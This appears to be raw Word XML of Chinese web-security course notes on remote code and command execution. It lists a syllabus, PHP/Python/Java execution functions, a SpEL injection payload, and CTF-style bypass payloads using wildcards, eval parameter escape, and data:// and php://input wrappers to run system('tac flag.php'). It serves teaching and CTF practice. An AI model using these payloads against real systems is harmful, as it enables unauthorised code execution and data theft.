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A03D4" w14:textId="77777777" w:rsidR="00D31978" w:rsidRDefault="00D31978" w:rsidP="00D31978">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:pBdr>
          <w:bottom w:val="triple" w:sz="2" w:space="0" w:color="FC0403"/>
        </w:pBdr>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web攻防-RCE&amp;代码执行&amp;命令执行&amp;无回显方案&amp;语言表达式&amp;黑盒功能点&amp;白盒方法名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40219C9B" w14:textId="312613B9" w:rsidR="00D31978" w:rsidRDefault="00D31978" w:rsidP="00D31978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2E4F9745" wp14:editId="65E8DAFD">
            <wp:extent cx="5270500" cy="164655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1AFD0" w14:textId="77777777" w:rsidR="00D31978" w:rsidRDefault="00D31978" w:rsidP="00D31978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知识点：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产生原理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应用因素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各类数据库类型利用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参数类型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*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参数格式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-XML&amp;JSON&amp;BASE64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数字字符搜索等符号绕过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操作方法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增删改查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头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&amp;UA&amp;Cookie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-HTTP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头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&amp;XFF&amp;Referer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操作方法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增删改查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布尔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延时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报错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盲注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高权限用户差异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跨库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文件读写带外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堆叠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二次注入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-SQLMAP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进阶使用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分类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存储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&amp;DOM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文件类型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-html&amp;pdf&amp;swf&amp;svg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功能逻辑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-postMessage&amp;localStorage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浏览器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转换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-UXSS&amp;MXSS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框架和库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-VUE&amp;React&amp;Electron&amp;JQuery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手工代码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框架工具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在线平台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-Cookie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盗取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数据提交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网络钓鱼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安全防护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&amp;CSP&amp;Httponly&amp;WAF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跨站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工具项目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&amp;XSStrike&amp;Chypass_pro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-CSRF-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检测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-CSRF-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-Referer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策略隐患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-CSRF-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防御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-Token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校验策略隐患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利用绕过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伪协议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&amp;IP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及域名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挖掘思路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功能逻辑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&amp;SRC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复盘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插件结合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-SRC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复盘与实战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前端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黑白名单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&amp;MIME&amp;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文件头等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执行权限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解码还原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云存储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分站等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思维导图形成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提取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特定漏洞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第三方编辑器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文件包含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-LFI&amp;RFI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利用思路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伪协议玩法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无文件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黑白盒案例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&amp;SRC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复盘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文件下载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读取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删除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&amp;URL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目录遍历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泄露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*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穿越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&amp;URL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-XML&amp;XXE-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注入原理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四大分类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-XML&amp;XXE-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文件读取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&amp;SSRF&amp;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实体引用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-XML&amp;XXE-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无回显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升级拓展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挖掘思路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-XML&amp;XXE-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黑盒功能点挖掘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-XML&amp;XXE-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白盒函数点挖掘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-RCE-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代码执行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命令执行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-RCE-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黑盒功能点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数据包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-RCE-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白盒函数方法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组件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章节点：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OWTOP10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注入，文件安全（上传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下载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读取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删除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包含等），目录遍历，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CRLF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SSTI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XML&amp;XXE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RCE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执行（代码或命令等）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反序列化，业务逻辑（验证码，接口枚举，支付购买，机制验证，越权，并发等）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未授权访问，失效访问控制，弱口令安全，第三方组件安全，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CORS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JSONP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</w:p>
    <w:p w14:paraId="5E429FAB" w14:textId="32588E6F" w:rsidR="00D31978" w:rsidRDefault="00D31978" w:rsidP="00D31978">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="both"/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3E6B034A" wp14:editId="07DC87F6">
            <wp:extent cx="5270500" cy="585025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85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44C8C" w14:textId="77777777" w:rsidR="00D31978" w:rsidRDefault="00D31978" w:rsidP="00D31978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演示案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03296025" w14:textId="77777777" w:rsidR="00D31978" w:rsidRDefault="00D31978" w:rsidP="00D31978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WEB攻防-RCE-代码执行&amp;命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655A1147" w14:textId="77777777" w:rsidR="00D31978" w:rsidRDefault="00D31978" w:rsidP="00D31978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WEB攻防-RCE-回显&amp;功能点&amp;引发链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B55C695" w14:textId="77777777" w:rsidR="00D31978" w:rsidRDefault="00D31978" w:rsidP="00D31978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-RCE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代码执行：引用脚本代码解析执行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-RCE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命令执行：脚本调用操作系统命令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漏洞函数：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1.PHP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代码执行函数：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eval()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assert()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preg_replace()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create_function()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array_map()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call_user_func()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call_user_func_array()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array_filter()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uasort()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PHP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命令执行函数：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system()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exec()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shell_exec()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pcntl_exec()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popen()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proc_popen()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passthru()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2.Python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eval exec subprocess os.system commands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3.Java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Java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中没有类似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中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eval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函数这种直接可以将字符串转化为代码执行的函数，但是有反射机制，并且有各种基于反射机制的表达式引擎，如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: OGNL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SpEL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MVEL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.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#RCE-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代码执行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功能点举例：在线编程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#RCE-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命令执行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功能点举例：系统面板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#RCE-Java&amp;PHP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SPEL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：（功能点举例：评论解析）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comment=T(java.lang.Runtime).getRuntime().exec('calc')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其他漏洞引发链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注入，文件包含，文件上传，反序列化等引发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有回显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无回显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、直接写个文件访问查看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、直接进行对外访问接受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黑盒案例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代码在线运行平台测试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白盒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CTF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29-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通配符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system('tac fla*.php');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30-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取代函数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通配符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管道符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`cp fla*.ph* 2.txt`;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echo shell_exec('tac fla*.ph*');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31-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参数逃逸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eval($_GET[1]);&amp;1=system('tac flag.php');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32~36-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配合包含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伪协议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include$_GET[a]?&gt;&amp;a=data://text/plain,&lt;?=system('tac flag.php');?&gt;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include$_GET[a]?&gt;&amp;a=php://filter/read=convert.base64-encode/resource=flag.php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37~39-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包含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RCE&amp;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伪协议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通配符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data://text/plain,&lt;?php system('tac fla*');?&gt;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php://input post:&lt;?php system('tac flag.php');?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B0214A" w14:textId="77777777" w:rsidR="00D31978" w:rsidRDefault="00D31978" w:rsidP="00D31978">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:pBdr>
          <w:bottom w:val="thinThickThinSmallGap" w:sz="48" w:space="0" w:color="030102"/>
        </w:pBdr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涉及资源：</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="1E6FFF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>资源下载地址</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63F9E195" w14:textId="77777777" w:rsidR="00D31978" w:rsidRDefault="00D31978" w:rsidP="00D31978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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB7E976" w14:textId="77777777" w:rsidR="007D6251" w:rsidRDefault="007D6251"/>
    <w:sectPr w:rsidR="007D6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C26A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E61E8CD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B80"/>
    <w:rsid w:val="007D6251"/>
    <w:rsid w:val="00835B80"/>
    <w:rsid w:val="00D3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17CCD-587B-4F1C-BF66-6171871B9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D31978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319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3197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31978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319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8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qq.com/doc/DQ3Z6RkNpaUtMcE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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-23T05:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-23T05:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>